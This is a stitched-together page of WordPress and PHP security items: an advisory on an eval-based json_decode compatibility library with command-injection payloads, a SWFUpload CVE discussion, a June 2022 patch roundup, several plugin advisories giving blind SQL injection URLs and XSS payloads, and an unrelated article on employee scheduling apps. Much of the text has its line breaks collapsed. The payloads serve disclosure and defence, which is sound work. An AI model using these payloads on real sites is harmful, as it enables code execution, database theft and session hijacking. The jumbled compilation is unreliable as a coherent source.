Several PHP compatibility libraries contain a potential remote code execution flaw in their json_decode() function based on having copy pasted existing vulnerable code. Affected components include the WassUp Realtime analytics WordPress plugin, AjaXplorer Core, and more.

    JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function===============================================================================Several PHP compatability libraries contain a potential remote codeexecutionflaw in their `json_decode()` function based on having copy pasted existingvulnerable code.Identifiers--------------------------------------- * JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txtAffected components--------------------------------------- * WassUp Realtime analytics wordpress plugin/compat library -https://wordpress.org/plugins/wassup/ * AjaXplorer Core -https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released * FlexoCMS - https://github.com/flexocms/flexo1.source * Various code -https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code * compat_functions.php - http://techfromhel.comDescription---------------------------------------This appears to date back to a compatability library published in 2010 andappears in several code bases, with no, or a few variations.The vulnerable code generally share the following characteristic: * The json_decode function is declared if it does not exist * some str_replace occurs to transform the json representation to PHP * eval($out)Since `eval()` is turing complete, it is generally considered unsafe to useiton user controlled or user influenced data, however it is unclear ifpracticalexploitation would be possible due to the likely presence of an existing json_decode function.```php/** * compat_functions.php * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively * @author: Helene D. <http://techfromhel.com> * @version: 0.3 - 2010-09-13 * @since Wassup 1.8 *//** * Convert simple JSON data into a PHP object (default) or associative *   array. Emulates 'json_decode' function from PHP 5.2+ * @author: Helene Duncker <http://techfromhel.com> * @param string,boolean * @return (array or object) */if (!function_exists('json_decode')) {function json_decode($json,$to_array=false) {$x=false;if (!empty($json) && strpos($json,'{"')!==false) {$out ='$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);eval($out.';');if (!$to_array) $x = (object) $x;}return $x;} //end function json_decode}```Proof of Concept---------------------------------------The eval can be exploited a number of ways, both via full or partialcontrol of the json string:```php/* Payload`id`;//{"*/json_decode('`id`;//{"');```or partially controlled content:```php/* Payload{"key":"value");echo `id`;//"}*/json_decode('{"key":"value");echo `id`;//"}');```Credit---------------------------------------Eldar "Wireghoul" MarcussenSolution---------------------------------------Ensure json_decode is present as a native function for your PHPinstallation.

PHP Library Remote Code Execution

There is an object injection vulnerability in swfupload plugin for wordpress.

Copy link

Member

** **nacin** commented Jul 3, 2013**

From an email sent by @nealpoole:

> Do you have a proposed fix for the "object injection" issue? My initial thought is that the buttonImageURL parameter is working exactly as intended. The behavior is similar to a message board that allows you to embed images from third party websites. We could try to artificially constrain the image to the same domain as the SWF, but with open redirects and increased use of CDNs that change seems likely to break backwards compatibility and not serve as a complete fix.

From an email sent by me:

> We agree with Neal that the image injection issue is more or less intended behavior, especially since fixing the XSS prevents a potential problem where the image can be used with XSS to help trick a user. The original reporter indicated a link between these issues as well, and we don't really see the image injection as a vulnerability in itself.
> 
> There are three ways to resolve this: 1) Remove support for buttonImageURL entirely. 2) Enforce the same domain for buttonImageURL. 3) Do nothing. None of these are perfect. Doing nothing does not entirely resolve the issue of trust, as you could use this to serve sketchy images from a trusted domain. The other options (removing buttonImageURL or enforcing the same domain) would indeed break current behavior, but the goal of our fork is for SWFUpload to be secure, not necessarily pretty and functional. But, having a button image is still pretty important. I've spoken to a few members of the WP security team and we're leaning toward WONTFIX for this, or if consensus ends up being same-domain, we can do that too.

From an email sent by Szymon Gruszecki:

> consider another way to resolve "the issue": disable passing app parameters by URL. As I can see in current SWFUpload source code there are JS callbacks that allows to set these values - only parameter "moveName" cannot be set in another way than by FlashVars.

for the time being those looking for a immediate solution just use below in .htaccess  
<files swfupload.swf> order allow,deny deny from all </files>

If you need to keep swfupload.swf accessible but want to prevent the use of the buttonImageURL parameter, something like this might work...

    RewriteCond %{QUERY_STRING} (?:^|&)buttonImageURL=([^&]+) [NC]
    RewriteRule ^wp-includes/js/swfupload/swfupload.swf$ - [R=404,L]
    

Copy link

Member

** **nacin** commented Jul 19, 2013**

Please take discussion to oss-security so Steve/Andrew/etc can see it.

CVE-2013-4144: Image object injection vulnerability via 'buttonImageURL' parameter · Issue #1 · WordPress/secure-swfupload

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

June has seen the release of multiple security updates, with important patches issued for the likes of Google's Chrome and Android as well as dozens of patches for Microsoft products, including fixes for a Windows zero-day vulnerability that attackers had already exploited. Apple updates were absent at the time of writing, but the month also included some major enterprise-focused patches for Citrix, SAP, and Cisco products.

Here’s what you need to know about the major patches released in the past month.

Microsoft

Microsoft’s Patch Tuesday release was pretty hefty in June, including fixes for 55 flaws in the tech giant’s products. This Patch Tuesday was particularly important because it addressed an already exploited remote code execution (RCE) issue in Windows dubbed Follina, which Microsoft has been aware of since at least May.

Tracked as CVE-2022-30190, Follina—which takes advantage of vulnerabilities in the Windows Support Diagnostic tool and can execute without the need to open a document—has already been used by multiple criminal groups and state-sponsored attackers.

Three of the vulnerabilities addressed in Patch Tuesday affecting Windows Server are RCE flaws and rated as critical. However, the patches seem to be breaking some VPN and RDP connections, so be careful.

Google Chrome

Google Chrome updates continue to come thick and fast. That’s no bad thing, as the world’s most popular browser is by default one of the biggest targets for hackers. In June, Google released Chrome 103 with patches for 14 vulnerabilities, some of which are serious.

Tracked as CVE-2022-2156, the biggest flaw is a use-after-free issue in Base reported by Google’s Project Zero bug-hunting team that could lead to arbitrary code execution, denial of service, or corruption of data. Worse, when chained with other vulnerabilities the flaw could lead to full system compromise.

Other issues patched in Chrome include vulnerabilities in Interest Groups, WebApp Provider, and a flaw in the V8 Javascript and WebAssembly engine.

Google Android

Of the multiple Android security issues Google patched in June, the most severe is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed, Google said in its Android Security Bulletin.

Google also released updates for its Pixel devices to patch issues in the Android Framework, Media Framework, and System Components.

Samsung users seem to have gotten lucky with Android updates of late, with the device maker rolling out its patches very quickly. The June security update is no different, reaching the Samsung Galaxy Tab S7 series, Galaxy S21 series, Galaxy S22 series, and the Galaxy Z Fold 2 straightaway.

Cisco

Software maker Cisco released a patch in June to fix a critical vulnerability in Cisco Secure Email and Web Manager and Cisco Email Security Appliance that could allow a remote attacker to bypass authentication and log in to the web management interface of an affected device.

The issue, tracked as CVE-2022-20798, could be exploited if an attacker enters something specific on the login page of the affected device, which would provide access to the web-based management interface, Cisco said.

Citrix

Citrix has issued a warning urging users to patch some major vulnerabilities that could let attackers reset admin passwords. The vulnerabilities in Citrix Application Delivery Management could result in corruption of the system by a remote, unauthenticated user, Citrix said in a security bulletin. “The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted,” the company wrote.

Citrix recommends that traffic to the Citrix ADM’s IP address be segmented from standard network traffic. This diminishes the risk of exploitation, it said. However, the vendor also urged customers to install the updated versions of Citrix ADM server and Citrix ADM agent “as soon as possible.”

SAP

Software firm SAP has released 12 security patches as part of its June Patch Day, three of which are serious. The first listed by SAP relates to an update released on April 2018 Patch Day and applies to the browser control Google Chromium used by the firm’s business clients. Details of this vulnerability aren’t available, but it has a severity score of 10, so the patch should be applied straightaway.

Another major fix concerns an issue in the SAProuter proxy in NetWeaver and ABAP Platform, which could allow an attacker to execute SAProuter administration commands from a remote client. The third major patch fixes a privilege escalation bug in SAP PowerDesigner Proxy 16.7.

Splunk Enterprise

Splunk has released some out-of-band patches for its Enterprise product, fixing issues including a critical-rated vulnerability that could lead to arbitrary code execution.

Labeled CVE-2022-32158, the flaw could allow an adversary to compromise a Universal Forwarder endpoint and execute code on other endpoints connected to the deployment server. Thankfully, there’s no indication that the vulnerability has been used in any real-world attacks.

Ninja Forms WordPress Plug-In

Ninja Forms, a WordPress plug-in with over a million active installations, has patched a serious issue that’s probably being used by attackers in the wild. “We uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection,” security analysts at the WordPress Wordfence Threat Intelligence team said in an update.

This could allow attackers to execute arbitrary code or delete arbitrary files on sites where a separate POP chain was present, researchers said.

The flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. WordPress appears to have performed a forced automatic update for the plug-in, so your site may already be using one of the patched versions.

Atlassian

Australian software company Atlassian has released a patch to fix a zero-day flaw that’s already being exploited by attackers. Tracked as CVE-2022-26134, the RCE vulnerability in the Confluence Server and Data Center can be used to backdoor internet-exposed servers.

GitLab

GitLab has issued patches for versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition and Enterprise Edition. The updates contain important security fixes for eight vulnerabilities, one of which could allow for account takeover.

With this in mind, the firm “strongly recommends” that all GitLab installations be upgraded to the latest version “as soon as possible.” GitLab.com is already running the patched version.

You Need to Update Windows and Chrome Right Now

A vulnerability classified as critical has been found in Online Hotel Booking System Pro Plugin 1.0. Affected is an unknown function of the file /front/roomtype-details.php. The manipulation of the argument tid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

    # # # # # 
    # Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
    # Google Dork: N/A
    # Date: 27.01.2017
    # Vendor Homepage: http://www.bestsoftinc.com/
    # Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
    # Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
    # E.t.c
    # # # # #

CVE-2017-20124: Offensive Security’s Exploit Database Archive

By Owais Sultan
If you’re the manager of a business with employees, you know how hard it can be to schedule…
This is a post from HackRead.com Read the original post: 3 Ways an Employee Scheduling App Can Streamline Your Business

If you’re the manager of a business with employees, you know how hard it can be to schedule everyone’s shifts correctly. The staff may not want to work on certain days, or you may need extra employees to cover peak hours when your business sees an influx of customers.

And if someone calls in sick, scheduling an emergency replacement could prove difficult if you don’t have the time to go through the employee files manually and cross-reference them with open shift times. Luckily, there are employee scheduling apps that can streamline this process and make your job easier than ever before.

**1) Automatic updates and reminders**

Once you sign up for an employee scheduling app, every member of your team is immediately updated with open shifts and appointment availability. Managers can access shift changes on their schedule from anywhere using a mobile device, tablet, or computer.

Using employee scheduling software is one of those small business tasks that you should never have to worry about again. Shift reminders are sent out automatically by email and text, keeping everyone informed about changes in shifts at all times.

Whether it’s adding or removing employees from specific shifts or modifying their attendance, these reminders help make sure your workers get notified as soon as possible, even if they don’t check their schedules daily or have forgotten to enter them into their calendar.

**2) Automated schedule adjustments**

It’s no secret that automated employee scheduling helps businesses avoid crunch time by making sure they always have enough employees to handle a sudden rush of customers. But even though it can be really helpful, many business owners don’t realize that it can also make their everyday lives easier by giving them more control over scheduling.

For example, you might use it to set extra coverage for certain days or hours and adjust your schedule throughout the week as needed. The result is fewer last-minute changes and less scrambling when things don’t go according to plan!

And with a bit of forward-thinking and planning, you can also set up automated schedule adjustments so your employees are scheduled for as much work as possible during busy times—without taking on unnecessary expenses during slower times.

**3) Free up time for employees**

By implementing a scheduling app, you free up employees’ time and allow them to focus on doing their best work. Moreover, employees can access their schedules from anywhere at any time, and they can check updates with one simple click.

A scheduling app also streamlines your business by enabling managers to post schedules in real-time. If your team is constantly changing its schedule or needs to reschedule frequently, using a scheduling app will help keep everyone informed and provide your employees with more stability.

**The Bottom Line**

The most important consideration when determining whether an employee scheduling app is right for your business is making sure it can work with your existing systems and help increase efficiency. When you’re just starting out, that means a lot of manual entry; an automated system will save time down the road when you’re working with a more complex schedule.

If you want to save money on employee payroll costs and avoid having to hire another full-time member of staff to handle your scheduling, consider trying an employee scheduling app as part of your back-office software suite.

*   How to Teach Your Employees About Cybersecurity
*   4 Ways For Employees To Distinguish Phishing Attacks
*   Employee training is key to keeping your enterprise safe
*   Why your remote employees may underperform? Top 10 problems
*   WordPress security: Steps to assess an employee before granting admin access

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

3 Ways an Employee Scheduling App Can Streamline Your Business

A vulnerability classified as problematic has been found in Easy Table Plugin 1.6. This affects an unknown part of the file /wordpress/wp-admin/options-general.php. The manipulation with the input "><script>alert(1)</script> leads to basic cross site scripting. It is possible to initiate the attack remotely.

CVE-2017-20108

A vulnerability classified as critical has been found in Kama Click Counter Plugin up to 3.4.8. This affects an unknown part of the file wp-admin/admin.php. The manipulation of the argument order_by/order with the input ASC%2c(select*from(select(sleep(2)))a) leads to sql injection (Blind). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.4.9 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection**

_From_: Manuel Garcia Cardenas <advidsec () gmail com>  
_Date_: Mon, 27 Feb 2017 08:04:48 +0100  

\=============================================
MGC ALERT 2017-002
- Original release date: February 21, 2017
- Last revised:  February 28, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection

II. BACKGROUND
-------------------------
Using this plugin you will have statistics on clicks on your files or any
other link (not file).

III. DESCRIPTION
-------------------------
This bug was found using the portal in the
/wp-content/plugins/kama-clic-counter/admin.php file.

In the line 172,173 do not sanitize the input values.

$order\_by = ($x= & $\_GET\['order\_by'\]) ? esc\_sql($x) : 'link\_date';
$order    = ($x= & $\_GET\['order'\]) ? esc\_sql($x) : 'DESC';

And in the line 182 or 186 the sql sentence is executed:

$sql = "SELECT \* FROM $wpdb->kcc\_clicks WHERE link\_url LIKE '%$s%' OR
link\_name LIKE '%$s%' ORDER BY $order\_by $order LIMIT $offset, $limit";
$sql = "SELECT \* FROM $wpdb->kcc\_clicks ORDER BY $order\_by $order LIMIT
$offset, $limit";

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed to all suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order\_by=link\_name&order=ASC%2c(select\*from(select(sleep(2)))a)&paged=1
(2 seconds of response)

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order\_by=link\_name&order=ASC%2c(select\*from(select(sleep(30)))a)&paged=1
(30 seconds of response)

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Kama Click Counter <= 3.4.9

VII. SOLUTION
-------------------------
Disable the plugin until a fix is available.

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins-wp/kama-clic-counter/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 21, 2017 1: Initial release
February 28, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
February 21, 2017 2: Send to vendor
February 24, 2017 3: New contact with vendor without response
February 28, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection** _Manuel Garcia Cardenas (Feb 27)_

CVE-2017-20103: Full Disclosure: WordPress Plugin Kama Click Counter 3.4.9

A vulnerability was found in Analytics Stats Counter Statistics Plugin 1.2.2.5 and classified as critical. This issue affects some unknown processing. The manipulation leads to code injection. The attack may be initiated remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 06:59:09 +0100  

\------------------------------------------------------------------------
Analytics Stats Counter Statistics WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Analytics Stats
Counter Statistics WordPress Plugin, which can be used by an
unauthenticated user to instantiate arbitrary PHP Objects. Using this
vulnerability it is possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160803-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Analytics Stats Counter
Statistics WordPress Plugin version 1.2.2.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/analytics\_stats\_counter\_statistics\_wordpress\_plugin\_unauthenticated\_php\_object\_injection\_vulnerability.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Analytics Stats Counter Statistics WordPress Plugin unauthenticated PHP Object injection vulnerability** _Summer of Pwnage (Feb 28)_

CVE-2017-20099: Analytics Stats Counter Statistics WordPress Plugin unauthenticated PHP Object injection vulnerability

WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin ‘Simple Page Transition’  - Stored CrossSite Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/# Version: 1.4.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Vulnerable code*:```<label for="simple_page_transition_ignored"><?php _e( 'Ignored DownloadLinks', 'spt' ); ?></label><br /><input type="text" id="simple_page_transition_ignored"name="simple_page_transition_ignored" value="*<?php print$simple_page_transition_ignored; ?>*" /><br />```*#POC:*1- Install the plugin ‘simple page transition’ & activate it.2- Navigate towards the “ignored download links”3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`*#POC image:*https://imgur.com/yzaTkhi

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

WordPress W-DALIL plugin version 2.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/w-dalil/# Version: 2.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Vulnerable Code:```<input class="dalil_input" name="dalil-address" type="text"placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"value="<?php echo $dalil_information['dalil-address']; ?>"  />```#Steps To Reproduce :1 - First Install the plugin  "*w-dalil*" and activate it.2 - Go to Dalil —> Add New Dalil item3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=xonerror=alert(1)>*" and hit enter.#Poc Image :https://imgur.com/JPG97oh

Tag

#wordpress